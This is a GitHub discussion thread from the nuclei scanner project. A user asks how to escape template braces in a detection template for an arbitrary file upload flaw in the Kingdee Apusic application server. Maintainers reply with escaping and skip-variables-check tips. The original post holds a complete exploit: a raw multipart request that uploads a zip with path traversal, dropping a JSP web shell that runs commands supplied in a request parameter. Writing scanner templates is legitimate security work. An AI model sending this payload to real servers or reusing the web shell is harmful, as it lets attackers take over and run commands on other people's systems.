What should I do with the escaping of {{payload}} #4663

scarleast · 2024-01-19T03:40:01Z

scarleast
Jan 19, 2024

question

I am writing a templates of kingdee apusic server file upload vulnerability，which need to send HTTP request to upload a zip file. The payload is wrapped in {{}}，which causes the program to report errors.

original network traffic

POST /admin//protect/application/deployApp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary&#61;----WebKitFormBoundaryd9acIBdVuqKWDJbd
Accept-Encoding: gzip

------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;appName&#34;

111
------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;deployInServer&#34;

false
------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;clientFile&#34;; filename&#61;&#34;evil.zip&#34;
Content-Type: application/x-zip-compressed

{<!-- -->{unquote(&#34;PK\x03\x04\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00../../../../applications/default/public_html/shell2.jsp&lt;%\x0d\x0a    if \x28\&#34;admin\&#34;.equals\x28request.getParameter\x28\&#34;pwd\&#34;\x29\x29\x29 \x7b\x0d\x0a        java.io.InputStream input &#61; Runtime.getRuntime\x28\x29.exec\x28request.getParameter\x28\&#34;cmd\&#34;\x29\x29.getInputStream\x28\x29;\x0d\x0a        int len &#61; -1;\x0d\x0a        byte[] bytes &#61; new byte[4092];\x0d\x0a        while \x28\x28len &#61; input.read\x28bytes\x29\x29 !&#61; -1\x29 \x7b\x0d\x0a            out.println\x28new String\x28bytes, \&#34;GBK\&#34;\x29\x29;\x0d\x0a        \x7d\x0d\x0a    \x7d\x0d\x0a%&gt;PK\x01\x02\x14\x03\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00../../../../applications/default/public_html/shell2.jspPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00e\x00\x00\x00\xb9\x01\x00\x00\x00\x00&#34;)}}
------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;archivePath&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;baseContext&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;startType&#34;

auto
------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;loadon&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;virtualHost&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;allowHosts&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd
Content-Disposition: form-data; name&#61;&#34;denyHosts&#34;


------WebKitFormBoundaryd9acIBdVuqKWDJbd--

My template:

id: kingdee-apusic-fileupload

info:
  name: 金蝶Apusic应用服务器任意文件上传漏洞
  author: scarleast
  severity: high
  description: |
    金蝶Apusic应用服务器deployApp接口存在任意文件上传漏洞，攻击者可通过双斜杠绕过鉴权并上传恶意压缩包接管服务器权限。_金蝶 apusic 应用服务器存在一个任意文件上传漏洞
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/134654352
  metadata:
    verified: false

variables:
  post_body: 'unquote("PK\x03\x04\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00../../../../applications/default/public_html/shell2.jsp<%\x0d\x0a    if \x28\"admin\".equals\x28request.getParameter\x28\"pwd\"\x29\x29\x29 \x7b\x0d\x0a        java.io.InputStream input = Runtime.getRuntime\x28\x29.exec\x28request.getParameter\x28\"cmd\"\x29\x29.getInputStream\x28\x29;\x0d\x0a        int len = -1;\x0d\x0a        byte[] bytes = new byte[4092];\x0d\x0a        while \x28\x28len = input.read\x28bytes\x29\x29 != -1\x29 \x7b\x0d\x0a            out.println\x28new String\x28bytes, \"GBK\"\x29\x29;\x0d\x0a        
\x7d\x0d\x0a    \x7d\x0d\x0a%>PK\x01\x02\x14\x03\x14\x00\x00\x00\x00\x00\xe5y\x09Uk\x0a\xc8\xe7d\x01\x00\x00d\x01\x00\x007\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00../../../../applications/default/public_html/shell2.jspPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00e\x00\x00\x00\xb9\x01\x00\x00\x00\x00")'

http:
  - raw:
    - |
        POST /admin/protect/application/deployApp HTTP/1.1
        Host: {{Host}}:{{Port}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd
        Accept-Encoding: gzip
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="appName"
         
        111
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="deployInServer"
         
        false
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="clientFile"; filename="evil.zip"
        Content-Type: application/x-zip-compressed
        
        {{concat("{{", post_body, "}}")}}
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="archivePath"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="baseContext"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="startType"
         
        auto
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="loadon"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="virtualHost"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="allowHosts"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd
        Content-Disposition: form-data; name="denyHosts"
         
         
        ------WebKitFormBoundaryd9acIBdVuqKWDJbd--

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
        condition: and

nuclei output

other

I have read docs from https://docs.projectdiscovery.io/templates/protocols/http/basic-http，and have search for similar problem in issue/discussions,Seems like no one else is having my problem.I guess the problem need to escaping of {{payload}},is there any way to solve my problem?

Answered by ehsandeep

Jan 19, 2024

@scarleast you can also use skip-variables-check: true

for example - https://github.com/projectdiscovery/nuclei-templates/blob/9e98d5b5a247aa4cea9ebf5361ae9e99ebb1c819/http/cves/2021/CVE-2021-41749.yaml#L49

View full answer

olearycrew · 2024-01-19T17:20:41Z

olearycrew
Jan 19, 2024

I think that you may be able to escape those characters with \{\{ like that.

Alternatively, you may be able to first base64 encode your payload and then have nuclei decode it at run time.

0 replies

ehsandeep · 2024-01-19T17:54:13Z

ehsandeep
Jan 19, 2024
Maintainer

@scarleast you can also use skip-variables-check: true

for example - https://github.com/projectdiscovery/nuclei-templates/blob/9e98d5b5a247aa4cea9ebf5361ae9e99ebb1c819/http/cves/2021/CVE-2021-41749.yaml#L49

1 reply

scarleast Jan 22, 2024
Author

this works well, thanks.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ProjectDiscovery

What should I do with the escaping of {{payload}} #4663

{{title}}

Replies: 2 comments 1 reply

{{title}}

{{title}}

{{title}}

Select a reply

ProjectDiscovery

What should I do with the escaping of {{payload}} #4663

scarleast Jan 19, 2024

question

original network traffic

My template:

nuclei output

other

Replies: 2 comments · 1 reply

olearycrew Jan 19, 2024

ehsandeep Jan 19, 2024 Maintainer

scarleast Jan 22, 2024 Author

scarleast
Jan 19, 2024

Replies: 2 comments 1 reply

olearycrew
Jan 19, 2024

ehsandeep
Jan 19, 2024
Maintainer

scarleast Jan 22, 2024
Author